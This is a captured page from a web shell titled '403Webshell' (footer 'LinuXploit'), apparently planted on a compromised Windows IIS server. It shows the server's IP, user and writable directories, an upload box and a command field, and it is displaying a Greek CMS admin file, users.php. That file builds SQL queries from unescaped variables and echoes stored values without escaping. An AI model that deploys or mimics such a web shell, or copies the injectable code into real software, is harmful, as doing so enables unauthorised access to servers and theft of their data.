403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.216.231
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/control/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/inetpub/wwwroot/control/users.php
<?
// ----------------- ΔΙΑΧΕΙΡΙΣΗ ΧΡΗΣΤΩΝ -----------------------			
defined('_ALLOW_ACCESS') or die;

if (isset($edit_type))
{
	$usernames_array = $session->getAllUsernames();
	
	if ($edit_type=="insert")
	{
		$page_title = "Εισαγωγή Νέου Χρήστη";
	}
	else if ($edit_type=="update")
	{
		if ($_SESSION["cms_perm_backend_manage_users"]==0)
			$id = $_SESSION["cms_userid"];
		$myrow = $session->getUserById($id);
		$page_title = "Επεξεργασία Προφίλ Χρήστη";	
	}

	$usernames_string = "";
	foreach ($usernames_array as $username_item)
	{
		if ($username_item!=$myrow["username"])
		{
			if ($usernames_string!="")
				$usernames_string .= ",";
			$usernames_string .= $username_item;
		}
	}
	
	?>
		
	<div id="toolbar" class="users">
		<h3><?=$page_title;?></h3>
		<div class="submenu">
			<ul>
				<li><a href="javascript:;" onclick="if (checkUserForm()==true) document.userform.submit();" title="Αποθήκευση"><img src="images/button_save.png" alt=""><br>Αποθήκευση</a></li>
				<li><a href="index.php" title="Άκυρο"><img src="images/button_cancel.png" alt=""><br>Άκυρο</a></li>
			</ul>
		</div>
	</div>
	
	<form method="POST" name="userform" id="userform" action="index.php">
		<input type="hidden" name="submit_type" value="<?=$edit_type;?>">
		<input type="hidden" name="form_id" value="<?=$system->genRandomString()?>">						
		<input type="hidden" name="id" id="userid" value="<? echo $id ?>">
		<input type="hidden" name="usernames_string" id="usernames_string" value="<? echo $usernames_string ?>">
		
		<fieldset>
			<legend>Βασικό προφίλ</legend>
			<div>
				<label for="new_fullname">* Όνομα:</label>
				<input type="text" name="new_fullname" id="new_fullname" value="<?=$myrow["fullname"];?>">
			</div>
			<div>
				<label for="new_username">* Όνομα χρήστη:</label>
				<input type="text" name="new_username" id="new_username" value="<?=$myrow["username"];?>">
			</div>
			<div>
				<label for="new_password"><?=($edit_type=="insert"?"* ":"")?>Κωδικός:</label>
				<input type="password" name="new_password" id="new_password" value="" autocomplete="off">
			</div>
			<div>
				<label for="new_email">Email:</label>
				<input type="text" name="new_email" id="new_email" value="<?=$myrow["email"];?>">
			</div>
			<div>
				<label for="new_usergroup">Κατηγορία:</label>
				<?
				if ($edit_type=="insert")
				{
				?>
					<select size="1" name="new_usergroup" id="new_usergroup">
						<?
							$user_groups = $session->getUserGroups();
							$num_of_groups = count($user_groups);
							$i = 0;
							foreach ($user_groups as $group)
							{
								++$i;
								echo '<option value="'.$group["id"].'"'.($i==$num_of_groups?' selected':'').'>'.$group["group_name"].'</option>';
							}
						?>
					</select>				
				<?
				}
				else if ($edit_type=="update")
				{
					if ($myrow["system_admin"]==0)
					{
					?>
						<select size="1" name="new_usergroup" id="new_usergroup">
							<?
							if ($_SESSION["cms_perm_backend_manage_users"]==1)
								$result2 = $connector->query("SELECT * FROM user_groups WHERE sort_order>0 ORDER BY sort_order");
							else
								$result2 = $connector->query("SELECT * FROM user_groups WHERE id=".$myrow["usergroup"]);

							while ($myrow2 = $connector->fetchArray($result2))
							{
								echo '<option value="'.$myrow2["id"].'" '.($myrow2["id"]==$myrow["usergroup"]?"selected":"").'>'.$myrow2["group_name"].'</option>';
							}
							?>
						</select>
					<?
					}
					else
						echo 'Administrator (system)';
				}
				?>
			</div>
			<div>
				<label>Κατάσταση:</label>
				<?
				if ($myrow["system_admin"]==0)
				{							
					echo '<input type="radio" value="1" name="state"'.(($myrow["state"]=="1" or $edit_type=="insert")?" checked":"").'>Ενεργός&nbsp;';
					echo '<input type="radio" value="0" name="state"'.($myrow["state"]=="0"?" checked":"").'>Ανενεργός';
				}
				else
					echo 'Ενεργός';
				?>
			</div>
		</fieldset>
		<fieldset>
			<legend>Πρόσθετες πληροφορίες</legend>
			<div>
				<label for="website">Ιστοσελίδα:</label>
				<input type="text" name="website" id="website" value="<?=$myrow["website"];?>">
			</div>
			<div>
				<label for="address">Διεύθυνση:</label>
				<input type="text" name="address" id="address" value="<?=$myrow["address"];?>">
			</div>
			<div>
				<label for="telephone">Τηλέφωνο:</label>
				<input type="text" name="telephone" id="telephone" value="<?=$myrow["telephone"];?>">
			</div>
			<div>
				<label for="signature">Υπογραφή:</label>
				<textarea name="signature" id="signature"><?=$myrow["signature"];?></textarea>
			</div>
		</fieldset>
		<div id="note">* = υποχρεωτικά πεδία</div>
	</form>
<?
}
else
{
?>
	<div id="toolbar" class="users">
		<h3><? if ($_SESSION["cms_perm_backend_manage_users"]==1) echo "Διαχείριση Χρηστών"; else echo "Επεξεργασία Προφίλ"?></h3>
		<div class="submenu">
			<ul>
				<li><a href="index.php?edit_type=insert" title="Προσθήκη νέου χρήστη"><img src="images/add_user.jpg"><br />Νέος χρήστης</a></li></li>
			</ul>
		</div>
	</div>	
	
	<?
	if (isset($submit_type))
	{		
		if ($_SESSION["form_id"] != $form_id)  // Το $_SESSION["form_id"] != $form_id αποτρέπει το resubmit της φόρμας σε περίπτωση reload της σελίδας
		{
			if ($submit_type=="insert")
			{
				$result = $session->insertNewUser($new_fullname, $new_username, $new_password, $new_email, $new_usergroup, $state, $website, $address, $telephone, $signature);
				$msg = array("Ο χρήστης προστέθηκε επιτυχώς", "Δυστυχώς απέτυχε η εισαγωγή του νέου χρήστη");			
			}
			else if ($submit_type=="update")
			{
				$result = $session->updateUser($id, $new_fullname, $new_password, $new_email, $website, $address, $telephone, $signature);							
				$msg = array("Ο χρήστης ενημερώθηκε επιτυχώς", "Δυστυχώς απέτυχε η ενημέρωση των στοιχείων του χρήστη");			
			}
			
			if ($result==true)
			{
				if ($submit_type=="update")
				{
					$myrow = $session->getUserById($id);
					if ($myrow["system_admin"]==0)
						$session->updateUserCore($id, $new_username, $new_usergroup, $state);
				}
				
				echo "<div class='notification success'><div>".$msg[0]."</div></div>";
				
				if ($submit_type=="insert")
					$session->insertLog("Επιτυχής δημιουργία νέου χρήστη με username: ".$new_username);
				else
					$session->insertLog("Επιτυχής αλλαγή των στοιχείων του χρήστη με id: ".$id);
			}
			else
			{
				echo "<div class='notification error'><div>".$msg[1]."</div></div>";

				if ($submit_type=="insert")
					$session->insertLog("Ανεπιτυχής δημιουργία νέου χρήστη με username: ".$new_username);
				else
					$session->insertLog("Ανεπιτυχής αλλαγή των στοιχείων του χρήστη με id: ".$id);
			}
			
			$_SESSION["form_id"] = $form_id;
		}
	}
	else if ($delete)
	{
		$myrow = $session->getUserById($deleteid);
		
		if ($myrow["system_admin"]==1)
		{
			echo "<div class='notification error'><div>Δεν μπορείτε να διαγράψετε τον κεντρικό Administrator του συστήματος</div></div>";
			$session->insertLog("Ανεπιτυχής προσπάθεια διαγραφής του κεντρικού Administrator");
		}
		else if ($myrow["usergroup"]==1)
		{
			echo "<div class='notification error'><div>Δεν μπορείτε να διαγράψετε χρήστη με ιδιότητα Administrator</div></div>";
			$session->insertLog("Ανεπιτυχής προσπάθεια διαγραφής χρήστη με ιδιότητα Administrator και id".$deleteid);
		}
		else if ($deleteid == $_SESSION["cms_userid"])
		{
			echo "<div class='notification error'><div>Δεν μπορείτε να διαγράψετε τον εαυτό σας</div></div>";
			$session->insertLog("Ανεπιτυχής προσπάθεια διαγραφής του εαυτού του ο χρήστης με id".$deleteid);
		}
		else
		{
			$result = $session->deleteUser($deleteid);
			if ($result==true)
			{
				echo "<div class='notification success'><div>Ο χρήστης διαγράφηκε επιτυχώς</div></div>";
				$session->insertLog("Επιτυχής διαγραφή του χρήστη με id: ".$deleteid);
			}
			else
			{
				echo "<div class='notification error'><div>Δυστυχώς η διαγραφή του χρήστη απέτυχε</div></div>";
				$session->insertLog("Ανεπιτυχής διαγραφή του χρήστη με id: ".$deleteid);
			}
		}
	}
	else if (isset($toggleState))
	{
		$session->toggleUserState($id);
		$session->insertLog("Εναλλαγή κατάστασης του χρήστη με id: ".$id);
	}
	
	if ($_SESSION["cms_perm_backend_manage_users"]==1)
	{
		if ($_SESSION["cms_content_state"]!=-1)
			$criteria[] = "state=".$_SESSION["cms_content_state"];
		if ($_SESSION["cms_content_category"]!=-1)
			$criteria[] = "usergroup=".$_SESSION["cms_content_category"]."";
		$criteria[] = "users.usergroup=user_groups.id";

		$final_criteria = "WHERE ".implode(" and ",$criteria);
	}
	else
		$final_criteria = "WHERE users.id=".$_SESSION["cms_userid"]." and users.usergroup=user_groups.id";

	$result = $connector->query("SELECT *, users.id as id FROM users, user_groups $final_criteria ORDER BY ".$_SESSION["cms_table_ordering"]." ".$_SESSION["cms_order_type"]);
	$total_results = $connector->getNumRows($result);
	$aa=0;
	?>
	
	<div id="content_filters">					
	<? 
	if ($_SESSION["cms_perm_backend_manage_users"]==1)
	{
	?>
		<div>	
			<form method="POST" action="index.php">
				<input type="hidden" name="start" value="0">
				<label for="content_category">Κατηγορία:</label>
				<select size="1" name="content_category" id="content_category" OnChange="submit();">
					<option value="-1" <? if ($_SESSION["cms_content_category"]==-1) echo "selected";?>>Όλοι</option>
					<?
						$user_groups = $session->getUserGroups();
						foreach ($user_groups as $group)
						{
							echo '<option value="'.$group["id"].'" '.($group["id"]==$_SESSION["cms_content_category"]?"selected":"").'>'.$group["group_name"].'</option>';
						}										
					?>
				</select>
			</form>
		</div>
		<div>
			<form method="POST" action="index.php">
				<input type="hidden" name="start" value="0">
				<label for="content_state">Κατάσταση:</label>
				<select size="1" name="content_state" id="content_state" OnChange="submit();">
					<option value="1" <? if ($_SESSION["cms_content_state"]=="1") echo "selected";?>>Ενεργοί</option>
					<option value="0" <? if ($_SESSION["cms_content_state"]=="0") echo "selected";?>>Ανενεργοί</option>
					<option value="-1" <? if ($_SESSION["cms_content_state"]=="-1") echo "selected";?>>Όλοι</option>
				</select>
			</form>
		</div>
	<?
	}
	?>
	</div> <!-- content_filters -->
	
	<table id="content_table">
		<thead>
			<tr>
				<th width="10">#</th>
				<th width="370"><a href="index.php?table_ordering=fullname&order_type=<? if ($_SESSION["cms_order_type"]=="ASC") echo "DESC"; else echo "ASC";?>" title="Ταξινόμηση με βάση αυτή τη στήλη">Όνομα</a><? if ($_SESSION["cms_table_ordering"]=="fullname" and $_SESSION["cms_order_type"]=="ASC") echo '&nbsp;<img src="images/sort_asc.png">'; else if ($_SESSION["cms_table_ordering"]=="fullname" and $_SESSION["cms_order_type"]=="DESC") echo '&nbsp;<img src="images/sort_desc.png">';?></th>
				<th width="100" nowrap><a href="index.php?table_ordering=username&order_type=<? if ($_SESSION["cms_order_type"]=="ASC") echo "DESC"; else echo "ASC";?>" title="Ταξινόμηση με βάση αυτή τη στήλη">Username</a><? if ($_SESSION["cms_table_ordering"]=="username" and $_SESSION["cms_order_type"]=="ASC") echo '&nbsp;<img src="images/sort_asc.png">'; else if ($_SESSION["cms_table_ordering"]=="username" and $_SESSION["cms_order_type"]=="DESC") echo '&nbsp;<img src="images/sort_desc.png">';?></th>
				<th width="90" nowrap><a href="index.php?table_ordering=state&order_type=<? if ($_SESSION["cms_order_type"]=="ASC") echo "DESC"; else echo "ASC";?>" title="Ταξινόμηση με βάση αυτή τη στήλη">Ενεργός</a><? if ($_SESSION["cms_table_ordering"]=="state" and $_SESSION["cms_order_type"]=="ASC") echo '&nbsp;<img src="images/sort_asc.png">'; else if ($_SESSION["cms_table_ordering"]=="state" and $_SESSION["cms_order_type"]=="DESC") echo '&nbsp;<img src="images/sort_desc.png">';?></th>
				<th width="90" nowrap><a href="index.php?table_ordering=usergroup&order_type=<? if ($_SESSION["cms_order_type"]=="ASC") echo "DESC"; else echo "ASC";?>" title="Ταξινόμηση με βάση αυτή τη στήλη">Κατηγορία</a><? if ($_SESSION["cms_table_ordering"]=="usergroup" and $_SESSION["cms_order_type"]=="ASC") echo '&nbsp;<img src="images/sort_asc.png">'; else if ($_SESSION["cms_table_ordering"]=="usergroup" and $_SESSION["cms_order_type"]=="DESC") echo '&nbsp;<img src="images/sort_desc.png">';?></th>
				<th width="100" nowrap><a href="index.php?table_ordering=email&order_type=<? if ($_SESSION["cms_order_type"]=="ASC") echo "DESC"; else echo "ASC";?>" title="Ταξινόμηση με βάση αυτή τη στήλη">Email</a><? if ($_SESSION["cms_table_ordering"]=="email" and $_SESSION["cms_order_type"]=="ASC") echo '&nbsp;<img src="images/sort_asc.png">'; else if ($_SESSION["cms_table_ordering"]=="email" and $_SESSION["cms_order_type"]=="DESC") echo '&nbsp;<img src="images/sort_desc.png">';?></th>
				<th width="140" nowrap><a href="index.php?table_ordering=lastvisit&order_type=<? if ($_SESSION["cms_order_type"]=="ASC") echo "DESC"; else echo "ASC";?>" title="Ταξινόμηση με βάση αυτή τη στήλη">Τελευταία είσοδος</a><? if ($_SESSION["cms_table_ordering"]=="lastvisit" and $_SESSION["cms_order_type"]=="ASC") echo '&nbsp;<img src="images/sort_asc.png">'; else if ($_SESSION["cms_table_ordering"]=="lastvisit" and $_SESSION["cms_order_type"]=="DESC") echo '&nbsp;<img src="images/sort_desc.png">';?></th>
				<th width="30">Επεξ.</th>
				<th width="30">Διαγρ.</th>
			</tr>
		</thead>
		<tbody>
		<? 
		$row_style = 0;	
		while ($myrow = $connector->fetchArray($result))
		{	
		?>
			<tr class="row<?=($row_style++ % 2) ?>">
				<td class="title_cell"><?=(++$aa)?></td>
				<td align="left"><a title="Επεξεργασία" href="index.php?edit_type=update&id=<?=$myrow["id"]?>"><?=$myrow["fullname"] ?></a></td>
				<td align="left"><?=$myrow["username"] ?></td>
				<td align="center">
					<?
					if ($myrow["system_admin"]==1) echo "<img src='images/icon_lock.png' title='Κεντρικός Administrator συστήματος'>";
					else if ($myrow["state"]==1) echo "<a href='index.php?toggleState=1&id=".$myrow["id"]."' title='Εναλλαγή κατάστασης'><img src='images/tick.png'></a>";
					else echo "<a href='index.php?toggleState=1&id=".$myrow["id"]."' title='Εναλλαγή κατάστασης'><img src='images/untick.png'></a>";
					?>
				</td>
				<td align="center"><?=$myrow["group_name"]?></td>
				<td align="left"><a href="mailto:<?=$myrow["email"] ?>"><?=$myrow["email"] ?></a></td>
				<td align="center" nowrap><? echo $system->formatDateTime($myrow["lastvisit"]) ?></td>
				<td align="center"><a title="Επεξεργασία" href="index.php?edit_type=update&id=<?=$myrow["id"]; ?>"><img src="images/b_edit.gif"></a></td>
				<td align="center"><a title="Διαγραφή" onClick="confirm_delete(<?=$myrow["id"]; ?>)" href="javascript:;"><img src="images/b_drop.gif"></a></td>
			</tr>
		<?
		}
		if ($aa==$_SESSION["cms_start"])
			echo '<tr><td height="30" colspan="8" align="center" valign="middle">- Κανένας χρήστης -</td></tr>';
		echo "</tbody></table>";
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit